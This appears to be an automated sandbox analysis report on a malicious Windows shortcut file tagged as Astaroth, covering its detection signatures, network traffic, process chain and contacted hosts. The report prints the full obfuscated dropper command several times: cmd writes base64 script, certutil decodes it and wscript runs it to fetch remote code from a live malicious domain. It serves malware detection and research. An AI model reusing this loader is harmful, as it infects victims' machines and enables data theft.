Windows Analysis Report
gzLeH3Dmtn.lnk

Overview

General Information

Sample Name: gzLeH3Dmtn.lnk
Analysis ID: 795670
MD5: 6a04cb119228b5ca8bb2fc2f4856103f
SHA1: 2f7eb865bd303466749a66e5cee8f21962d43cd0
SHA256: 0135bf39f5a2167cce8af04e8eaac0caee8b52123fea1a3ec2411be0a92da400
Tags: AstarothBRAgeoGuildmalnk
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Source: unknown HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49693 version: TLS 1.2

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Domain query: a8eiy8.innovationsinsight.cyou
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.123.96 443 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.4:49692 -> 188.114.96.3:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a8eiy8.innovationsinsight.cyouConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Feb 2023 06:21:01 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=NctGf338qS6Q8cshuHpQF7uH_MOJuTny5ADo4vU.xqk-1675232461-0-AW1Q7h5OMBuCvlggYK/BHKQyYSg3tgfvIRV9fHORHnQWMveDPLyaOdJTr2ypAAtGC4AQ5arCEIABAKODWktmY4Z2CurBlCA7OX1h8Nee2olT; path=/; expires=Wed, 01-Feb-23 06:51:01 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=4.9999998736894e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uv4Cu%2FH5ZRDqWs91VT3dCsC%2BGWzlthG4vMasGJWkt%2FsaHORTre%2BFtRjecD8DDQyi73ORgxl9At0bvivDoskcD6jynlgVCR8YlFvxCZXi6MR5WVHS423b2XGhqKRGnmUdjuCtYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnj5V9pFxnTHRN; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:21:01 GMT; HttpOnlyServer: cloudflareCF-RAY: 792895a4c8f030db-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/l
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://a8eiy8.innovationsinsight.cyou/
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://a8eiy8.innovationsinsight.cyou/?3/
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311600820.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310925472.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorT
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorfM
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/g
Source: unknown DNS traffic detected: queries for: a8eiy8.innovationsinsight.cyou
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a8eiy8.innovationsinsight.cyouConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49693 version: TLS 1.2
Source: C:\Windows\System32\certutil.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: classification engine Classification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior

Data Obfuscation
barindex
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310977085.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Domain query: a8eiy8.innovationsinsight.cyou
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.123.96 443 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\ydgc5p9\>nul 2>&1 &&s^et xehh=c:\ydgc5p9\^ydgc5p9.^js&&echo dmfyiem0nxq9innjiisicii7rdq1dd0iaxaikyj0omgio0u0nxq9ilqikyj0ucirijoio0dlde9iamvjdchdndv0k0q0nxqrrtq1dcsily9hogvpetguaw5ub3zhdglvbnnpbnnpz2h0lmn5b3uvpzmviik7>!xehh!&&certutil -f -deco^de !xehh! !xehh!&&ca^ll !xehh!
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 795670 Sample: gzLeH3Dmtn.lnk Startdate: 01/02/2023 Architecture: WINDOWS Score: 68 18 Snort IDS alert for network traffic 2->18 20 Windows shortcut file (LNK) starts blacklisted processes 2->20 22 Obfuscated command line found 2->22 6 cmd.exe 3 4 2->6         started        process3 process4 8 wscript.exe 12 6->8         started        12 certutil.exe 3 2 6->12         started        dnsIp5 14 a8eiy8.innovationsinsight.cyou 188.114.96.3, 49692, 80 CLOUDFLARENETUS European Union 8->14 16 www.cloudflare.com 104.16.123.96, 443, 49693 CLOUDFLARENETUS United States 8->16 24 System process connects to network (likely due to code injection or exploit) 8->24 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.96.3
 a8eiy8.innovationsinsight.cyou European Union
13335 CLOUDFLARENETUS true
104.16.123.96
 www.cloudflare.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
www.cloudflare.com 104.16.123.96 true
a8eiy8.innovationsinsight.cyou 188.114.96.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.cloudflare.com/cdn-cgi/error false
    		high
    http://a8eiy8.innovationsinsight.cyou/?3/ true
      		unknown